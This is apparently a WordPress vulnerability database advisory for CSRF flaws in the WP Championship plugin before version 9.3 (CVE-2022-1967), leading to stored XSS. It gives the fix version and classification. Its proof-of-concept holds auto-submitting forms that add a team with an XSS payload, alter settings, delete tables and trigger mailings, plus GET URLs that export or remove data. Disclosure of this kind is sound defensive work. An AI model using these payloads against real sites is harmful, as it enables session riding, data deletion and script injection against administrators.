WordPress Plugin Vulnerabilities

WP Championship < 9.3 - Multiple CSRF

Description

The plugin is lacking CSRF checks in various places, allowing attackers to make a logged in admin perform unwanted actions, such as create and delete arbitrary teams as well as update the plugin's settings. Due to the lack of sanitisation and escaping, it could also lead to Stored Cross-Site Scripting issues

Proof of Concept

<form id="test" action="https://example.com/wp-admin/admin.php?page=wp-championship%2Fcs_admin_team.php#" method="POST">
    <input type="text" name="action" value="addteam">
    <input type="text" name="team_name" value="<img src=x onerror=alert(/XSS/)>">
    <input type="text" name="team_shortname" value="test">
    <input type="text" name="team_icon" value="b">
    <input type="text" name="group" value="A">
    <input type="text" name="qualified" value="0">
    <input type="text" name="penalty" value="0">
    <input type="hidden" id="submit" name="submit" value="Mannschaft hinzufügen »">
</form>
<script>
HTMLFormElement.prototype.submit.call(
    document.getElementById("test")
);
</script>


https://example.com/wp-admin/admin-ajax.php?action=wpc_export&dlmode=true&exmode=team&fnmode=false


<form id="test" action="https://example.com/wp-admin/admin.php?page=wp-championship%2Fcs_admin.php#" method="POST">
    <input type="text" name="action" value="update">
    <input type="text" name="cs_groups" value="8">
    <input type="text" name="cs_pts_winner" value="3">
    <input type="text" name="cs_pts_looser" value="0">
    <input type="text" name="cs_pts_deuce" value="1">
    <input type="text" name="cs_group_teams" value="2">
    <input type="text" name="deltables_ok" value="1">
    <input type="text" name="deltables" value="Tabellen entfernen »">
    <input type="text" name="cs_pts_tipp" value="1">
    <input type="text" name="cs_pts_tendency" value="1">
    <input type="text" name="cs_stellv_schalter" value="1">
    <input type="text" name="cs_pts_supertipp" value="5">
    <input type="text" name="cs_modus" value="1">
    <input type="text" name="cs_pts_champ" value="1">
    <input type="text" name="cs_oneside_tendency" value="0">
    <input type="text" name="cs_pts_oneside" value="0">
    <input type="text" name="cs_reminder_hours" value="">
    <input type="text" name="cs_goalsum" value="-1">
    <input type="text" name="cs_rank_trend" value="1">
    <input type="text" name="cs_final_winner" value="-1">
    <input type="text" name="cs_pts_goalsum" value="0">
    <input type="text" name="cs_floating_link" value="1">
    <input type="text" name="cs_joker_idlist" value="">
    <input type="text" name="cs_joker_player" value="">
    <input type="text" name="cs_number_of_tippdays" value="">
    <input type="text" name="cs_xmlrpc_news" value=" ">
</form>
<script>
    document.getElementById("test").submit();
</script>


<form id="test" action="https://example.com/wp-admin/admin.php?page=wp-championship%2Fcs_admin.php#" method="POST">
    <input type="text" name="action" value="update">
    <input type="text" name="cs_groups" value="8">
    <input type="text" name="cs_pts_winner" value="3">
    <input type="text" name="mailservice_ok" value="1">
    <input type="text" name="mailservice1" value="Mailservice auslösen »">
    <input type="text" name="cs_pts_looser" value="0">
    <input type="text" name="cs_pts_deuce" value="1">
    <input type="text" name="cs_group_teams" value="2">
    <input type="text" name="cs_pts_tipp" value="1">
    <input type="text" name="cs_pts_tendency" value="1">
    <input type="text" name="cs_stellv_schalter" value="1">
    <input type="text" name="cs_pts_supertipp" value="5">
    <input type="text" name="cs_modus" value="1">
    <input type="text" name="cs_pts_champ" value="1">
    <input type="text" name="cs_oneside_tendency" value="0">
    <input type="text" name="cs_pts_oneside" value="0">
    <input type="text" name="cs_reminder_hours" value="">
    <input type="text" name="cs_goalsum" value="-1">
    <input type="text" name="cs_rank_trend" value="1">
    <input type="text" name="cs_final_winner" value="-1">
    <input type="text" name="cs_pts_goalsum" value="0">
    <input type="text" name="cs_floating_link" value="1">
    <input type="text" name="cs_joker_idlist" value="">
    <input type="text" name="cs_joker_player" value="">
    <input type="text" name="cs_number_of_tippdays" value="">
    <input type="text" name="cs_xmlrpc_news" value=" ">
</form>
<script>
    document.getElementById("test").submit();
</script>


https://example.com/wp-admin/admin.php?page=wp-championship/cs_admin_team.php&action=remove&tid=1
https://example.com/wp-admin/admin.php?page=wp-championship/cs_admin_finals.php&action=remove&mid=1

Affects Plugins

Plugin icon
wp-championship
Fixed in 9.3

References

CVE
CVE-2022-1967

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
https://daniel-ruf.de
Verified
Yes
WPVDB ID
02d25736-c796-49bd-b774-66e0e3fcf4c9

Timeline

Publicly Published
2022-06-16 (about 1 years ago)
Added
2022-06-13 (about 1 years ago)
Last Updated
2023-03-13 (about 1 years ago)

Other

Published
Title
Published
2024-02-12
Title
SMTP Mail Plugin < 1.3.21 - Cross Site Request Forgery
Published
2020-09-16
Title
Product Catalog Simple < 1.5.13 - Cross-Site Request Forgery
Published
2022-05-23
Title
LaTeX for WordPress <= 3.4.10 - Arbitrary Settings Update via CSRF to Stored XSS
Published
2023-10-12
Title
Taggbox <= 3.3 - Cross-Site Request Forgery
Published
2018-12-19
Title
WP Ultimate CSV Importer <= 5.6 - CSRF